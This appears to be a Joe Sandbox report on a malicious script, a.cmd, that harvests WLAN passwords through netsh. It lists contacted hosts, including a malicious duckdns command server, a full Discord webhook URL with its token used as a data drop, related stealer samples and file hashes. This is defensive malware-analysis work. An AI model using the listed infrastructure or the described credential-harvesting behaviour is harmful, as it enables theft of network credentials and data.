powershell.exe 28 20->35         started        signatures10 process11 signatures12 93 Tries to harvest and steal WLAN passwords 30->93 37 netsh.exe 2 30->37         started        39 conhost.exe 30->39         started        41 findstr.exe 1 30->41         started        43 chcp.com 1 30->43         started        45 netsh.exe 2 33->45         started        47 conhost.exe 33->47         started        49 chcp.com 1 33->49         started        process13

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
a.cmd3%ReversingLabs

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
https://go.micro0%URL Reputationsafe
https://contoso.com/License0%URL Reputationsafe
https://contoso.com/Icon0%URL Reputationsafe
https://contoso.com/0%URL Reputationsafe
https://oneget.orgX0%URL Reputationsafe
https://oneget.org0%URL Reputationsafe
https://discord.com/api/webhooks/895657579101958174/9Z8CPsHdivzzExezi2PenJZuA1sRTvhR7zSiHiSBhPgUVEAa0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
ip-api.com
208.95.112.1
truefalse
    		high
    dcxwq1.duckdns.org
    		91.92.249.117
    		truetrue
      		unknown
      api.mylnikov.org
      		104.21.44.66
      		truefalse
        		high
        icanhazip.com
        		104.16.185.241
        		truefalse
          		high
          27.58.7.0.in-addr.arpa
          		unknown
          		unknowntrue
            		unknown

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15false
              		high
              http://icanhazip.com/false
                		high
                http://ip-api.com/line/?fields=hostingfalse
                  		high

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  https://duckduckgo.com/chrome_newtabtmp5662.tmp.dat.7.dr, tmp562F.tmp.dat.7.drfalse
                    		high
                    https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDFtmp5721.tmp.dat.7.drfalse
                      		high
                      http://nuget.org/NuGet.exepowershell.exe, 00000008.00000002.1717054429.000001D021BB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1733109212.000001D031993000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1733109212.000001D03185D000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000008.00000002.1717054429.000001D022C24000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://duckduckgo.com/ac/?q=tmp5662.tmp.dat.7.dr, tmp562F.tmp.dat.7.drfalse
                            		high
                            https://www.google.com/images/branding/product/ico/googleg_lodp.icotmp5662.tmp.dat.7.dr, tmp562F.tmp.dat.7.drfalse
                              		high
                              http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000008.00000002.1717054429.000001D023364000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1736124764.000001D0397D0000.00000004.00000020.00020000.00000000.sdmptrue
                              • URL Reputation: malware
                              		unknown
                              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000008.00000002.1717054429.000001D023364000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1736124764.000001D0397D0000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                https://go.micropowershell.exe, 00000008.00000002.1717054429.000001D022C24000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://contoso.com/Licensepowershell.exe, 00000008.00000002.1733109212.000001D03185D000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://contoso.com/Iconpowershell.exe, 00000008.00000002.1733109212.000001D03185D000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=tmp5662.tmp.dat.7.dr, tmp562F.tmp.dat.7.drfalse
                                  		high
                                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=tmp5662.tmp.dat.7.dr, tmp562F.tmp.dat.7.drfalse
                                    		high
                                    https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016History.txt.7.dr, tmp5651.tmp.dat.7.dr, tmp5661.tmp.dat.7.drfalse
                                      		high
                                      https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17History.txt.7.dr, tmp5651.tmp.dat.7.dr, tmp5661.tmp.dat.7.drfalse
                                        		high
                                        https://www.ecosia.org/newtab/tmp5662.tmp.dat.7.dr, tmp562F.tmp.dat.7.drfalse
                                          		high
                                          https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brtmp5721.tmp.dat.7.drfalse
                                            		high
                                            https://github.com/Pester/Pesterpowershell.exe, 00000008.00000002.1717054429.000001D023364000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1736124764.000001D0397D0000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              https://ac.ecosia.org/autocomplete?q=tmp5662.tmp.dat.7.dr, tmp562F.tmp.dat.7.drfalse
                                                		high
                                                https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Installtmp5651.tmp.dat.7.dr, tmp5661.tmp.dat.7.drfalse
                                                  		high
                                                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchtmp5662.tmp.dat.7.dr, tmp562F.tmp.dat.7.drfalse
                                                    		high
                                                    https://contoso.com/powershell.exe, 00000008.00000002.1733109212.000001D03185D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://nuget.org/nuget.exepowershell.exe, 00000008.00000002.1717054429.000001D021AB5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1717054429.000001D0233EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1733109212.000001D031993000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1733109212.000001D03185D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://oneget.orgXpowershell.exe, 00000008.00000002.1717054429.000001D022C24000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://discord.com/api/webhooks/895657579101958174/9Z8CPsHdivzzExezi2PenJZuA1sRTvhR7zSiHiSBhPgUVEAace3ed400-d1e84918ad678b08d2a369a3-Latest.log.7.drfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://aka.ms/pscore68powershell.exe, 00000008.00000002.1717054429.000001D0217D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://support.mozilla.orgtmp5721.tmp.dat.7.drfalse
                                                          		high
                                                          https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examplestmp5651.tmp.dat.7.dr, tmp5661.tmp.dat.7.drfalse
                                                            		high
                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000008.00000002.1717054429.000001D0217D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=tmp5662.tmp.dat.7.dr, tmp562F.tmp.dat.7.drfalse
                                                                		high
                                                                https://oneget.orgpowershell.exe, 00000008.00000002.1717054429.000001D022C24000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                		unknown

                                                                World Map of Contacted IPs

                                                                • No. of IPs < 25%
                                                                • 25% < No. of IPs < 50%
                                                                • 50% < No. of IPs < 75%
                                                                • 75% < No. of IPs

                                                                Public IPs

                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                208.95.112.1
                                                                		ip-api.comUnited States
                                                                		53334TUT-ASUSfalse
                                                                104.21.44.66
                                                                		api.mylnikov.orgUnited States
                                                                		13335CLOUDFLARENETUSfalse
                                                                104.16.185.241
                                                                		icanhazip.comUnited States
                                                                		13335CLOUDFLARENETUSfalse
                                                                91.92.249.117
                                                                		dcxwq1.duckdns.orgBulgaria
                                                                		34368THEZONEBGtrue

                                                                General Information

                                                                Joe Sandbox version:40.0.0 Tourmaline
                                                                Analysis ID:1431886
                                                                Start date and time:2024-04-25 22:44:08 +02:00
                                                                Joe Sandbox product:CloudBasic
                                                                Overall analysis duration:0h 7m 33s
                                                                Hypervisor based Inspection enabled:false
                                                                Report type:full
                                                                Cookbook file name:default.jbs
                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                Number of analysed new started processes analysed:22
                                                                Number of new started drivers analysed:0
                                                                Number of existing processes analysed:0
                                                                Number of existing drivers analysed:0
                                                                Number of injected processes analysed:0
                                                                Technologies:
                                                                • HCA enabled
                                                                • EGA enabled
                                                                • AMSI enabled
                                                                Analysis Mode:default
                                                                Analysis stop reason:Timeout
                                                                Sample name:a.cmd
                                                                Detection:MAL
                                                                Classification:mal100.troj.spyw.evad.winCMD@31/33@7/4
                                                                EGA Information:
                                                                • Successful, ratio: 100%
                                                                HCA Information:
                                                                • Successful, ratio: 60%
                                                                • Number of executed functions: 5
                                                                • Number of non-executed functions: 2
                                                                Cookbook Comments:
                                                                • Found application associated with file extension: .cmd
                                                                • Override analysis time to 240s for powershell

                                                                Warnings

                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                • Excluded IPs from analysis (whitelisted): 23.40.205.26, 23.40.205.17, 23.40.205.40, 23.40.205.67, 23.40.205.42, 23.40.205.11, 23.40.205.66, 23.40.205.65, 23.40.205.57
                                                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, a767.dspw65.akamai.net, wu-bg-shim.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net
                                                                • Not all processes where analyzed, report is missing behavior information
                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                • VT rate limit hit for: a.cmd

                                                                Simulations

                                                                Behavior and APIs

                                                                TimeTypeDescription
                                                                22:45:01API Interceptor53x Sleep call for process: powershell.exe modified

                                                                Joe Sandbox View / Context

                                                                IPs

                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                208.95.112.1xtnhsVjQTxvH.exeGet hashmaliciousQuasarBrowse
                                                                • ip-api.com/json/
                                                                o3KyzpE7F4.ps1Get hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                • ip-api.com/line/?fields=hosting
                                                                SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                • ip-api.com/line/?fields=hosting
                                                                SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeGet hashmaliciousExela Stealer, Python StealerBrowse
                                                                • ip-api.com/json
                                                                Control-Tributario_KFRCkzlbCHUSEBMRSECA.zipGet hashmaliciousUnknownBrowse
                                                                • ip-api.com/json
                                                                Swift Payment.batGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                • ip-api.com/line/?fields=hosting
                                                                SARL RABINEAU Order FA2495.exeGet hashmaliciousAgentTeslaBrowse
                                                                • ip-api.com/line/?fields=hosting
                                                                PURCHASE ORDER LIST GREEN VALLY CORP PDF.batGet hashmaliciousGuLoaderBrowse
                                                                • ip-api.com/line/?fields=hosting
                                                                Spare part list.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                • ip-api.com/line/?fields=hosting
                                                                QUOTATION_APRQTRA031244#U00b7PDF.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                • ip-api.com/line/?fields=hosting
                                                                104.21.44.66UMJLhijN4z.exeGet hashmaliciousAsyncRAT, Prynt Stealer, StormKitty, WorldWind StealerBrowse
                                                                  HTZ4az17lj.exeGet hashmaliciousStormKittyBrowse
                                                                    ZoominstallerFull.exeGet hashmaliciousPureLog Stealer, RedLine, zgRATBrowse
                                                                      YVrNKlaWqu.exeGet hashmaliciousAsyncRAT, Neshta, StormKitty, WorldWind StealerBrowse
                                                                        hesaphareketi-01.pdf.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                          WinDir.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind Stealer, zgRATBrowse
                                                                            Hesap_Ekstresi_11956117.PDF.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                              Dekont.pdf.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                                z30PO1028930.exeGet hashmaliciousAsyncRAT, StormKitty, VenomRATBrowse
                                                                                  vZFGXiTg6o.exeGet hashmaliciousAsyncRAT, StormKitty, VenomRATBrowse

                                                                                    Domains

                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    ip-api.comxtnhsVjQTxvH.exeGet hashmaliciousQuasarBrowse
                                                                                    • 208.95.112.1
                                                                                    o3KyzpE7F4.ps1Get hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                    • 208.95.112.1
                                                                                    SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                    • 208.95.112.1
                                                                                    SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeGet hashmaliciousExela Stealer, Python StealerBrowse
                                                                                    • 208.95.112.1
                                                                                    Control-Tributario_KFRCkzlbCHUSEBMRSECA.zipGet hashmaliciousUnknownBrowse
                                                                                    • 208.95.112.1
                                                                                    Swift Payment.batGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                    • 208.95.112.1
                                                                                    SARL RABINEAU Order FA2495.exeGet hashmaliciousAgentTeslaBrowse
                                                                                    • 208.95.112.1
                                                                                    PURCHASE ORDER LIST GREEN VALLY CORP PDF.batGet hashmaliciousGuLoaderBrowse
                                                                                    • 208.95.112.1
                                                                                    Spare part list.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                    • 208.95.112.1
                                                                                    QUOTATION_APRQTRA031244#U00b7PDF.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                    • 208.95.112.1
                                                                                    api.mylnikov.orgUMJLhijN4z.exeGet hashmaliciousAsyncRAT, Prynt Stealer, StormKitty, WorldWind StealerBrowse
                                                                                    • 104.21.44.66
                                                                                    HTZ4az17lj.exeGet hashmaliciousStormKittyBrowse
                                                                                    • 104.21.44.66
                                                                                    GxrG78Getq.exeGet hashmaliciousAsyncRAT, Blackshades, Quasar, StormKitty, WorldWind StealerBrowse
                                                                                    • 172.67.196.114
                                                                                    Lex-DKM988293.zipGet hashmaliciousAsyncRAT, DcRatBrowse
                                                                                    • 104.21.44.66
                                                                                    Tax_docs_2023.pdf.lnkGet hashmaliciousMetasploitBrowse
                                                                                    • 172.67.196.114
                                                                                    ZoominstallerFull.exeGet hashmaliciousPureLog Stealer, RedLine, zgRATBrowse
                                                                                    • 104.21.44.66
                                                                                    YVrNKlaWqu.exeGet hashmaliciousAsyncRAT, Neshta, StormKitty, WorldWind StealerBrowse
                                                                                    • 104.21.44.66
                                                                                    hesaphareketi-01.pdf.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                                    • 104.21.44.66
                                                                                    iUi6TG0GhX.exeGet hashmaliciousAsyncRAT, Njrat, RevengeRAT, StormKitty, VenomRAT, XmrigBrowse
                                                                                    • 172.67.196.114
                                                                                    PAYMENT-COPYaosi.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                                    • 172.67.196.114
                                                                                    icanhazip.comUMJLhijN4z.exeGet hashmaliciousAsyncRAT, Prynt Stealer, StormKitty, WorldWind StealerBrowse
                                                                                    • 104.16.185.241
                                                                                    https://lithiuimvalley.com/ssdGet hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                                                    • 104.16.185.241
                                                                                    file.exeGet hashmaliciousGuLoader, PXRECVOWEIWOEI StealerBrowse
                                                                                    • 104.16.185.241
                                                                                    HTZ4az17lj.exeGet hashmaliciousStormKittyBrowse
                                                                                    • 104.16.185.241
                                                                                    GxrG78Getq.exeGet hashmaliciousAsyncRAT, Blackshades, Quasar, StormKitty, WorldWind StealerBrowse
                                                                                    • 104.16.185.241
                                                                                    Lex-DKM988293.zipGet hashmaliciousAsyncRAT, DcRatBrowse
                                                                                    • 104.16.184.241
                                                                                    PURCHASE_ORDER.jsGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                                                                    • 104.16.185.241
                                                                                    Tax_docs_2023.pdf.lnkGet hashmaliciousMetasploitBrowse
                                                                                    • 104.16.185.241
                                                                                    ZoominstallerFull.exeGet hashmaliciousPureLog Stealer, RedLine, zgRATBrowse
                                                                                    • 104.16.185.241
                                                                                    sendslogstotg.exeGet hashmaliciousUnknownBrowse
                                                                                    • 104.18.114.97

                                                                                    ASNs

                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    THEZONEBGztVUah3Wy9.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                    • 91.92.240.43
                                                                                    OTpMIf3qBf.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                    • 91.92.240.43
                                                                                    aZxA9dZCxS.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                    • 91.92.240.43
                                                                                    NPXiAZtvNq.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                    • 91.92.240.43
                                                                                    ndVOUQPH8q.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                    • 91.92.240.43
                                                                                    Pb7emU2ZDo.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                    • 91.92.240.43
                                                                                    zVGUW4F2PT.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                    • 91.92.240.43
                                                                                    EQYrfnHzXO.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                    • 91.92.240.43
                                                                                    KMj8h32vWy.exeGet hashmaliciousAsyncRAT, PureLog StealerBrowse
                                                                                    • 91.92.253.249
                                                                                    Mt#879161_YAT_ORER_AY27102_3017182_2LAP183.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                                                                                    • 91.92.248.36
                                                                                    CLOUDFLARENETUS360total.dll.dllGet hashmaliciousLatrodectusBrowse
                                                                                    • 172.67.219.28
                                                                                    ad.msiGet hashmaliciousLatrodectusBrowse
                                                                                    • 104.21.46.75
                                                                                    https://fusiongsb.com/wofice/Get hashmaliciousUnknownBrowse
                                                                                    • 104.21.20.41
                                                                                    https://c-m-c-group.com/Get hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                                                    • 104.17.2.184
                                                                                    https://falic.co/office/office_cookies/main/Get hashmaliciousUnknownBrowse
                                                                                    • 172.67.212.156
                                                                                    https://autode.sk/4bb5BeVGet hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                                                    • 104.17.27.92
                                                                                    https://lide.alosalca.fun/highbox#joeblow@xyz.comGet hashmaliciousHTMLPhisherBrowse
                                                                                    • 104.26.13.205
                                                                                    https://www.bing.com/ck/a?!&&p=8c604c2d3901cb1eJmltdHM9MTcxMjc5MzYwMCZpZ3VpZD0wODdjNjgyYy00N2ZlLTYyOGQtMzA1ZC03YmVmNDY5NTYzNjUmaW5zaWQ9NTE2MQ&ptn=3&ver=2&hsh=3&fclid=087c682c-47fe-628d-305d-7bef46956365&u=a1aHR0cHM6Ly9rZWljb3NlY3VyaXR5LmNvbS5teC8&ntb=1Get hashmaliciousUnknownBrowse
                                                                                    • 104.17.25.14
                                                                                    https://u18727881.ct.sendgrid.net/ls/click?upn=u001.C98xKppRPMcm9u3MCGfzKZoMS1OpBvTt67698T0dL36uvjeaIcwJCGWCF40JX0jTgfIq_7OnzmxzMpUZLpDhO-2FIQbFKADvzXAOcu2Z6qDokXjolLBB1Q9VRzsF9K8mIjVEFl-2BHay6WBbN5WlzpyVSr4HVkHTzvzCtmwku69-2FJZyLx3-2B4ShTXTnPqinKBtOGbSRbSYGRG3Lt22AUmt-2BZ99sH-2B6Jqf0nt-2BFsnaCp0VSm16eoPdzoH74Sn7jINM2DWCxglARpPWuPOE3iiXY03LGL6ko4g-3D-3DGet hashmaliciousUnknownBrowse
                                                                                    • 1.1.1.1
                                                                                    http://asana.wfGet hashmaliciousUnknownBrowse
                                                                                    • 172.67.74.152
                                                                                    CLOUDFLARENETUS360total.dll.dllGet hashmaliciousLatrodectusBrowse
                                                                                    • 172.67.219.28
                                                                                    ad.msiGet hashmaliciousLatrodectusBrowse
                                                                                    • 104.21.46.75
                                                                                    https://fusiongsb.com/wofice/Get hashmaliciousUnknownBrowse
                                                                                    • 104.21.20.41
                                                                                    https://c-m-c-group.com/Get hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                                                    • 104.17.2.184
                                                                                    https://falic.co/office/office_cookies/main/Get hashmaliciousUnknownBrowse
                                                                                    • 172.67.212.156
                                                                                    https://autode.sk/4bb5BeVGet hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                                                    • 104.17.27.92
                                                                                    https://lide.alosalca.fun/highbox#joeblow@xyz.comGet hashmaliciousHTMLPhisherBrowse
                                                                                    • 104.26.13.205
                                                                                    https://www.bing.com/ck/a?!&&p=8c604c2d3901cb1eJmltdHM9MTcxMjc5MzYwMCZpZ3VpZD0wODdjNjgyYy00N2ZlLTYyOGQtMzA1ZC03YmVmNDY5NTYzNjUmaW5zaWQ9NTE2MQ&ptn=3&ver=2&hsh=3&fclid=087c682c-47fe-628d-305d-7bef46956365&u=a1aHR0cHM6Ly9rZWljb3NlY3VyaXR5LmNvbS5teC8&ntb=1Get hashmaliciousUnknownBrowse
                                                                                    • 104.17.25.14
                                                                                    https://u18727881.ct.sendgrid.net/ls/click?upn=u001.C98xKppRPMcm9u3MCGfzKZoMS1OpBvTt67698T0dL36uvjeaIcwJCGWCF40JX0jTgfIq_7OnzmxzMpUZLpDhO-2FIQbFKADvzXAOcu2Z6qDokXjolLBB1Q9VRzsF9K8mIjVEFl-2BHay6WBbN5WlzpyVSr4HVkHTzvzCtmwku69-2FJZyLx3-2B4ShTXTnPqinKBtOGbSRbSYGRG3Lt22AUmt-2BZ99sH-2B6Jqf0nt-2BFsnaCp0VSm16eoPdzoH74Sn7jINM2DWCxglARpPWuPOE3iiXY03LGL6ko4g-3D-3DGet hashmaliciousUnknownBrowse
                                                                                    • 1.1.1.1
                                                                                    http://asana.wfGet hashmaliciousUnknownBrowse
                                                                                    • 172.67.74.152
                                                                                    TUT-ASUSxtnhsVjQTxvH.exeGet hashmaliciousQuasarBrowse
                                                                                    • 208.95.112.1
                                                                                    o3KyzpE7F4.ps1Get hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                    • 208.95.112.1
                                                                                    SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                    • 208.95.112.1
                                                                                    SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeGet hashmaliciousExela Stealer, Python StealerBrowse
                                                                                    • 208.95.112.1
                                                                                    Control-Tributario_KFRCkzlbCHUSEBMRSECA.zipGet hashmaliciousUnknownBrowse
                                                                                    • 208.95.112.1
                                                                                    Swift Payment.batGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                    • 208.95.112.1
                                                                                    SARL RABINEAU Order FA2495.exeGet hashmaliciousAgentTeslaBrowse
                                                                                    • 208.95.112.1
                                                                                    PURCHASE ORDER LIST GREEN VALLY CORP PDF.batGet hashmaliciousGuLoaderBrowse
                                                                                    • 208.95.112.1
                                                                                    Spare part list.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                    • 208.95.112.1
                                                                                    QUOTATION_APRQTRA031244#U00b7PDF.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                    • 208.95.112.1

                                                                                    JA3 Fingerprints

                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    3b5074b1b5d032e5620f69f9f700ff0ehttp://papajoeschicago.comGet hashmaliciousUnknownBrowse
                                                                                    • 104.21.44.66
                                                                                    https://www.bing.com/ck/a?!&&p=8c604c2d3901cb1eJmltdHM9MTcxMjc5MzYwMCZpZ3VpZD0wODdjNjgyYy00N2ZlLTYyOGQtMzA1ZC03YmVmNDY5NTYzNjUmaW5zaWQ9NTE2MQ&ptn=3&ver=2&hsh=3&fclid=087c682c-47fe-628d-305d-7bef46956365&u=a1aHR0cHM6Ly9rZWljb3NlY3VyaXR5LmNvbS5teC8&ntb=1Get hashmaliciousUnknownBrowse
                                                                                    • 104.21.44.66
                                                                                    o3KyzpE7F4.ps1Get hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                    • 104.21.44.66
                                                                                    https://web.lehighvalleychamber.org/cwt/external/wcpages/referral.aspx?ReferralType=W&ProfileID=5337&ListingID=4065&CategoryID=74&SubCategoryID=0&url=//sanemedia.ca/owaow/yjyo8q/bWFyaWEud29qY2llY2hvd3NraUBjby5tb25tb3V0aC5uai51cw==Get hashmaliciousHTMLPhisherBrowse
                                                                                    • 104.21.44.66
                                                                                    http://wsj.pmGet hashmaliciousNetSupport RATBrowse
                                                                                    • 104.21.44.66
                                                                                    Isass.exeGet hashmaliciousUnknownBrowse
                                                                                    • 104.21.44.66
                                                                                    https://itniy4gbb.cc.rs6.net/tn.jsp?f=001DpCT81a7BIE926OduG6KmKkwKebSAbUZq28C52DoY-FfQJyM_2Gq3l18V1j7KWwJQTfGlQ_HSq0vC8xqJqFST9z0CwmpWgUieBjKckdJcSODJ_3vu5MzvaSoOGbGY9SjpWQtg9-aAXm1e6VV91z84Q2_wlyDMR98&c=i37ZFF5Dy2QSFqOfb2TVpr5vkMFqaR6DdoQbIhzcRV7G2oFwX8NEvA==&ch=2ErEiCYnoykaXa1uoD0AgTD1vOpSqc6zh3ef32Gb4XR_ut8_qvmzHA==&c=&ch=&__=/mrlZp0zmTKgGvsPpx0JUyCMjGZr4J6/Z2dvbnphbGV6c2FsYXNAc2FuaXRhcy5lcw==Get hashmaliciousHTMLPhisherBrowse
                                                                                    • 104.21.44.66
                                                                                    SecuriteInfo.com.Win32.PWSX-gen.18376.4403.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                    • 104.21.44.66
                                                                                    Minutes_of_15th_Session_of_PSC.pdf.exeGet hashmaliciousUnknownBrowse
                                                                                    • 104.21.44.66
                                                                                    Minutes_of_15th_Session_of_PSC.pdf.exeGet hashmaliciousUnknownBrowse
                                                                                    • 104.21.44.66

                                                                                    Dropped Files

                                                                                    No context

                                                                                    Created / dropped Files

                                                                                    C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 69993 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                                    Category:dropped
                                                                                    Size (bytes):69993
                                                                                    Entropy (8bit):7.99584879649948
                                                                                    Encrypted:true
                                                                                    SSDEEP:1536:iMveRG6BWC7T2g1wGUa5QUoaIB9ttiFJG+AOQOXl0Usvwr:feRG6BX6gUaHo9tkBHiUewr
                                                                                    MD5:29F65BA8E88C063813CC50A4EA544E93
                                                                                    SHA1:05A7040D5C127E68C25D81CC51271FFB8BEF3568
                                                                                    SHA-256:1ED81FA8DFB6999A9FEDC6E779138FFD99568992E22D300ACD181A6D2C8DE184
                                                                                    SHA-512:E29B2E92C496245BED3372578074407E8EF8882906CE10C35B3C8DEEBFEFE01B5FD7F3030ACAA693E175F4B7ACA6CD7D8D10AE1C731B09C5FA19035E005DE3AA
                                                                                    Malicious:false
                                                                                    Preview:MSCF....i.......,...................I.................oXAy .authroot.stl.Ez..Q6..CK..<Tk...p.k..1...3...[..%Y.f..."K.6)..[*I.hOB."..rK.RQ*..}f..f...}....9.|.....gA...30.,O2L...0..%.U...U.t.....`dqM2.x..t...<(uad.c...x5V.x..t..agd.v......i...KD..q(. ...JJ......#..'=. ...3.x...}...+T.K..!.'.`w .!.x.r.......YafhG..O.3....'P[..'.D../....n..t....R<..=\E7L0?{..T.f...ID...,...r....3z..O/.b.Iwx.. .o...a\.s........."..'.......<;s.[...l...6.)ll..B.P.....k.... k0.".t!/.,........{...P8....B..0(.. .Q.....d...q,\.$.n.Q.\.p...R..:.hr./..8.S<a.s...+#3....D..h1.a.0....{.9.....:e.......n.~G.{.M.1..OU.....B.Q..y_>.P{...}i.=.a..QQT.U..|!.pyCD@.....l..70..w..)...W^.`l...%Y.\................i..=hYV.O8W@P.=.r.=..1m..1....)\.p..|.c.3..t..[...).....l.{.Y....\S.....y....[.mCt....Js;...H....Q..F.....g.O...[..A.=...F[..z....k...mo.lW{`....O...T.g.Y.Uh.;m.'.N..f..}4..9i..t4p_bI..`.....Ie..l.P.... ...Lg......[....5g...~D.s.h'>n.m.c.7...-..P.gG...i$...v.m.b[.yO.P/*.YH.

                                                                                    C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                                                                                    Download File
